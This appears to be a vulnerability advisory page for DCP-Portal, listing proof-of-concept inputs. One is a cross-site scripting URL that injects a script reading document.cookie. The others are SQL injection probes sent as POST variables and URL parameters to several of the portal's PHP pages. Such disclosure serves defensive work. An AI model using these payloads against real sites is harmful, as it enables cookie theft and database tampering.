• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

DCP-Portal Multiple Input Validation Vulnerabilities

No exploit is required. The following examples are available:

Cross-site scripting:
http://www.example.com/index.php?page=send&cid=<script>alert(document.cookie);</script>

SQL injection:
register.php with the following POST variables:
sex=1&name=%27&surname=1&email=1&b_month=0&b_day=0&b_year=0&address=1&zip=1&city=1&country=1&job=1&tel=1&signature=1&username=1&password=1&password2=1&hide=on&list=on&action=send&submit=Send

lostpassword.php with the following POST variables:
mode=lost&email=%27&submit=Send

calendar.php with the following POST variables:
month=1&s=1&submit=GO&year='&day=01
month=1&s=1&submit=GO&year=%27&day=01

http://www.example.com/index.php?cid=%27[SQL]

http://www.example.com/forums.php?action=showmsg&mid=%27[SQL]